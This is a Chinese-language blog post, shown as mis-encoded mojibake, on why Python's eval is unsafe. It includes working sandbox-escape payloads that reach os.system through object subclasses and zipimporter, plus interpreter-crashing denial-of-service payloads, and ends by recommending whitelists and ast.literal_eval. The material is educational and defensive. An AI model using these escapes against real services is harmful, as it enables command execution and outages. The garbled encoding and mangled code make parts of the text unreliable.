python Ϊʲô˵evalÒªÉ÷ÓÃ
ʱ¼ä:2022-04-02 10:25 ×÷Õß:admin610456
evalÇ°ÑÔ
In [1]: eval("2+3")Out[1]: 5In [2]: eval('[x for x in range(9)]')Out[2]: [0, 1, 2, 3, 4, 5, 6, 7, 8]µ±ÄÚ´æÖеÄÄÚÖÃÄ£¿éº¬ÓÐosµÄ»°£¬evalͬÑù¿ÉÒÔ×öµ½ÃüÁîÖ´ÐУº
In [3]: import osIn [4]: eval("os.system('whoami')")hy-201707271917\administratorOut[4]: 0µ±È»£¬evalÖ»ÄÜÖ´ÐÐpython/' target='_blank'>pythonµÄ±í´ïʽÀàÐ͵ĴúÂ룬²»ÄÜÖ±½ÓÓÃËü½øÐÐimport²Ù×÷£¬µ«exec¿ÉÒÔ¡£Èç¹û·ÇҪʹÓÃeval½øÐÐimport£¬ÔòʹÓÃ__import__£º
In [8]: eval("__import__('os').system('whoami')")hy-201707271917\administratorOut[8]: 0ÔÚʵ¼ÊµÄ´úÂëÖУ¬ÍùÍùÓÐʹÓÿͻ§¶ËÊý¾Ý´øÈëevalÖÐÖ´ÐеÄÐèÇó¡£±ÈÈ綯̬ģ¿éµÄÒýÈ룬¾Ù¸öÀõ×Ó£¬Ò»¸öÔÚÏßÅÀ³æƽ̨ÉÏÅÀ³æ¿ÉÄÜÓжà¸ö²¢ÇÒλÓÚ²»Í¬µÄÄ£¿éÖУ¬·þÎñÆ÷¶Ëµ«ÍùÍùÖ»ÐèÒªµ÷ÓÃÓû§ÔÚ¿Í»§¶ËÑ¡ÔñµÄÅÀ³æÀàÐÍ£¬²¢Í¨¹ýºó¶ËµÄexec»òÕßeval½øÐж¯Ì¬µ÷Ó㬺ó¶Ë±àÂëʵÏַdz£·½±ã¡£µ«Èç¹û¶ÔÓû§µÄÇëÇó´¦Àí²»Ç¡µ±£¬¾Í»áÔì³ÉÑÏÖصݲȫ©¶´¡£
¡±°²È«¡±Ê¹ÓÃeval
ÏÖÔÚÌᳫ×î¶àµÄ¾ÍÊÇʹÓÃevalµÄºóÁ½¸ö²ÎÊýÀ´ÉèÖú¯ÊýµÄ°×Ãûµ¥£º
Evalº¯ÊýµÄÉùÃ÷Ϊeval(expression[, globals[, locals]])
ÆäÖУ¬µÚ¶þÈý¸ö²ÎÊý·Ö±ðÖ¸¶¨Äܹ»ÔÚevalÖÐʹÓõĺ¯ÊýµÈ£¬Èç¹û²»Ö¸¶¨£¬Ä¬ÈÏΪglobals()ºÍlocals()º¯ÊýÖÐ °üº¬µÄÄ£¿éºÍº¯Êý¡£
>>> import os>>> 'os' in globals()True>>> eval('os.system('whoami')')win-20140812chjadministrator0>>> eval('os.system('whoami')',{},{})Traceback (most recent call last): File "", line 1, in File "", line 1, in NameError: name 'os' is not definedÈç¹ûÖ¸¶¨Ö»ÔÊÐíµ÷ÓÃabsº¯Êý£¬¿ÉÒÔʹÓÃÏÂÃæµÄд·¨£º
>>> eval('abs(-20)',{'abs':abs},{'abs':abs})20>>> eval('os.system('whoami')',{'abs':abs},{'abs':abs})Traceback (most recent call last): File "", line 1, in File "", line 1, in NameError: name 'os' is not defined>>> eval('os.system('whoami')')win-20140812chjadministrator0ʹÓÃÕâÖÖ·½·¨À´·À»¤£¬È·Êµ¿ÉÒÔÆðµ½Ò»¶¨µÄ×÷Ó㬵«ÊÇ£¬ÕâÖÖ´¦Àí·½·¨¿ÉÄܻᱻÈƹý£¬´Ó¶øÔì³ÉÆäËûÎÊÌ⣡
ÈƹýÖ´ÐдúÂë1
±»ÈƹýµÄÇé¾°ÈçÏ£¬Ð¡Ã÷ÖªµÀÁËeval»á´øÀ´Ò»¶¨µÄ°²È«·çÏÕ£¬ËùÒÔʹÓÃÈçϵÄÊÖ¶ÎÈ¥·ÀÖ¹evalÖ´ÐÐÈÎÒâ´úÂ룺
env = {}env["locals"] = Noneenv["globals"] = Noneenv["__name__"] = Noneenv["__file__"] = Noneenv["__builtins__"] = None eval(users_str, env)PythonÖеÄ__builtins__ÊÇÄÚÖÃÄ£¿é£¬ÓÃÀ´ÉèÖÃÄÚÖú¯ÊýµÄÄ£¿é¡£±ÈÈçÊìϤµÄabs£¬openµÈÄÚÖú¯Êý£¬¶¼ÊÇÔÚ¸ÃÄ£¿éÖÐÒÔ×ÖµäµÄ·½Ê½´æ´¢µÄ£¬ÏÂÃæÁ½ÖÖд·¨Êǵȼ۵ģº
>>> __builtins__.abs(-20)20>>> abs(-20)20
ÎÒÃÇÒ²¿ÉÒÔ×Ô¶¨ÒåÄÚÖú¯Êý£¬²¢ÏñʹÓÃPythonÖеÄÄÚÖú¯ÊýÒ»ÑùʹÓÃËüÃÇ£º
>>> def hello():... print 'shabi'>>> __builtin__.__dict__['say_hello'] = hello>>> say_hello()shabi
СÃ÷½«evalº¯ÊýµÄ×÷ÓÃÓòÖеÄÄÚÖÃÄ£¿éÉèÖÃΪNone£¬ºÃÏñ¿´ÆðÀ´ºÜ³¹µ×ÁË£¬µ«ÒÀÈ»¿ÉÒÔ±»Èƹý¡£__builtins__ÊÇ__builtin__µÄÒ»¸öÒýÓã¬ÔÚ__main__Ä£¿éÏ£¬Á½ÕßÊǵȼ۵ģº
>>> id(__builtins__)3549136>>> id(__builtin__)3549136
¸ù¾ÝÎÚÔÆdropsÌáµ½µÄ·½·¨£¬Ê¹ÓÃÈçÏ´úÂë¼´¿É£º
[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == "zipimporter"][0]("/home/liaoxinxi/eval_test/configobj-4.4.0-py2.5.egg").load_module("configobj").os.system("uname")
ÉÏÃæµÄ´úÂëÊ×ÏÈÀûÓÃ__class__ºÍ__subclasses__¶¯Ì¬¼ÓÔØÁËobject¶ÔÏó£¬ÕâÊÇÒòΪevalÖÐÎÞ·¨Ö±½ÓʹÓÃobject¡£È»ºóʹÓÃobjectµÄ×ÓÀàµÄzipimporter¶ÔeggѹËõÎļþÖеÄconfigobjÄ£¿é½øÐе¼È룬²¢µ÷ÓÃÆäÄÚÖÃÄ£¿éÖеÄosÄ£¿é´Ó¶øʵÏÖÃüÁîÖ´ÐУ¬µ±È»£¬Ç°ÌáÊÇÒªÓÐconfigobjµÄeggÎļþ¡£ configobjÄ£¿éºÜÓÐÒâ˼£¬¾ÓÈ»ÄÚÖÃÁËosÄ£¿é£º
>>> "os" in configobj.__dict__True>>> import urllib>>> "os" in urllib.__dict__True>>> import urllib2>>> "os" in urllib2.__dict__True>>> configobj.os.system("whoami")win-20140812chjadministrator0ºÍconfigobjÀàËƵÄÄ£¿éÈçurllib£¬urllib2£¬setuptoolsµÈ¶¼ÓÐosµÄÄÚÖã¬ÀíÂÛÉÏʹÓÃÄĸö¶¼ÐС£ Èç¹ûÎÞ·¨ÏÂÔØeggѹËõÎļþ£¬¿ÉÒÔÏÂÔØ´øÓÐsetup.pyµÄÎļþ¼Ð£¬¼ÓÈ룺
from setuptools import setup, find_packages
È»ºóÖ´ÐÐ:
python setup.py bdist_egg
¾Í¿ÉÒÔÔÚdistÎļþ¼ÐÖÐÕÒµ½¶ÔÓ¦µÄeggÎļþ¡£ ÈƹýdemoÈçÏ£º
>>> env = {}>>> env["locals"] = None>>> env["globals"] = None>>> env["__name__"] = None>>> env["__file__"] = None>>> env["__builtins__"] = None>>> users_str = "[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == 'zipimporter'][0]('E:/internships/configobj-5.0.5-py2.7.egg').load_module('configobj').os.system('whoami')">>> eval(users_str, env)win-20140812chjadministrator0>>> eval(users_str, {}, {})win-20140812chjadministrator0¾Ü¾ø·þÎñ¹¥»÷1
objectµÄ×ÓÀàÖÐÓкܶàÓÐȤµÄ¶«Î÷£¬Ö´ÐÐÒÔÏ´úÂë²é¿´£º
[x.__name__ for x in ().__class__.__bases__[0].__subclasses__()]
ÕâÀïÎҾͲ»Êä³ö½á¹ûÁË£¬Èç¹ûÄãÖ´ÐеĻ°£¬¿ÉÒÔ¿´µ½ºÜ¶àÓÐȤµÄÄ£¿é£¬±ÈÈçfile£¬zipimporter£¬QuitterµÈ¡£¾¹ý²âÊÔ£¬fileµÄ¹¹Ô캯ÊýÊDZ»½âÊÍÆ÷ɳÏä¸ôÀëµÄ¡£ ¼òµ¥µÄ£¬»òÕßÖ±½Óʹobject±©Â¶³öµÄ×ÓÀàQuitter½øÐÐÍ˳ö£º
>>> eval("[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == 'Quitter'][0](0)()", {'__builtins__':None})C:/>
Èç¹ûÔËÆøºÃ£¬Óöµ½¶Ô·½³ÌÐòÖе¼ÈëÁËosµÈÃô¸ÐÄ£¿é£¬ÄÇôPopen¾Í¿ÉÒÔÓ㬲¢ÇÒÈƹý__builins__Ϊ¿ÕµÄÏÞÖÆ£¬Àý×ÓÈçÏ£º
>>> import subprocess>>> eval("[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == 'Popen'][0](['ping','-n','1','127.0.0.1'])",{'__builtins__':None}) >>>ÕýÔÚ Ping 127.0.0.1 ¾ßÓÐ 32 ×Ö½ÚµÄÊý¾Ý:
À´×Ô 127.0.0.1 µÄ»Ø¸´: ×Ö½Ú=32 ʱ¼ä>>ÊÂʵÉÏ£¬ÕâÖÖÇé¿ö·Ç³£¶à£¬±ÈÈçµ¼ÈëosÄ£¿é£¬Ò»°ãÓÃÀ´´¦Àí·¾¶ÎÊÌâ¡£ËùÒÔ˵£¬Óöµ½ÕâÖÖÇé¿ö£¬ÍêÈ«¿ÉÒÔÁоٴóÁ¿µÄ¹¦Äܺ¯Êý£¬À´Ì½²âÄ¿±êobjectµÄ×ÓÀàÖÐÊÇ·ñº¬ÓÐһЩΣÏյĺ¯Êý¿ÉÒÔÖ±½ÓʹÓá£
¾Ü¾ø·þÎñ¹¥»÷2
ͬÑù£¬ÎÒÃÇÉõÖÁ¿ÉÒÔÈƹý__builtins__ΪNone£¬Ôì³ÉÒ»´Î¾Ü¾ø·þÎñ¹¥»÷£¬Payload(À´×ÔÀÏÍâblog)ÈçÏ£º
>>> eval('(lambda fc=(lambda n: [c 1="c" 2="in" 3="().__class__.__bases__[0" language="for"][/c].__subclasses__() if c.__name__ == n][0]):fc("function")(fc("code")(0,0,0,0,"KABOOM",(),(),(),"","",0,""),{})())()', {"__builtins__":None})
ÔËÐÐÉÏÃæµÄ´úÂ룬PythonÖ±½ÓcrashµôÁË£¬Ôì³É¾Ü¾ø·þÎñ¹¥»÷¡£ ÔÀíÊÇͨ¹ýǶÌ×µÄlambdaÀ´¹¹ÔìһƬ´úÂë¶Î£¬¼´code¶ÔÏó¡£ÎªÕâ¸öcode¶ÔÏó·ÖÅä¿ÕµÄÕ»£¬²¢¸ø³öÏàÓ¦µÄ´úÂë×Ö·û´®£¬ÕâÀïÊÇKABOOM£¬ÔÚ¿ÕÕ»ÉÏÖ´ÐдúÂ룬»á³öÏÖcrash¡£¹¹ÔìÍê³Éºó£¬µ÷ÓÃfcº¯Êý¼´¿É´¥·¢£¬Æä˼·²»¿Éν²»Òùµ´¡£
×ܽá
´ÓÉÏÃæµÄÄÚÈÝÎÒÃÇ¿ÉÒÔ¿´³ö£¬µ¥µ¥½«ÄÚÖÃÄ£¿éÖÃΪ¿Õ£¬ÊDz»¹»µÄ£¬×îºÃµÄ»úÖÆÊǹ¹Ôì°×Ãûµ¥£¬Èç¹û¾õµÃ±È½ÏÂé·³£¬¿ÉÒÔʹÓÃast.literal_eval´úÌæ²»°²È«µÄeval¡£
ÒÔÉϾÍÊDZ¾ÎĵÄÈ«²¿ÄÚÈÝ£¬Ï£Íû¶Ô´ó¼ÒµÄѧϰÓÐËù°ïÖú£¬Ò²Ï£Íû´ó¼Ò¶à¶àÖ§³Ö½Å±¾Ö®¼Ò¡£
(ÔðÈα༣ºadmin)
17830004266(ÖØÇìÒƶ¯)
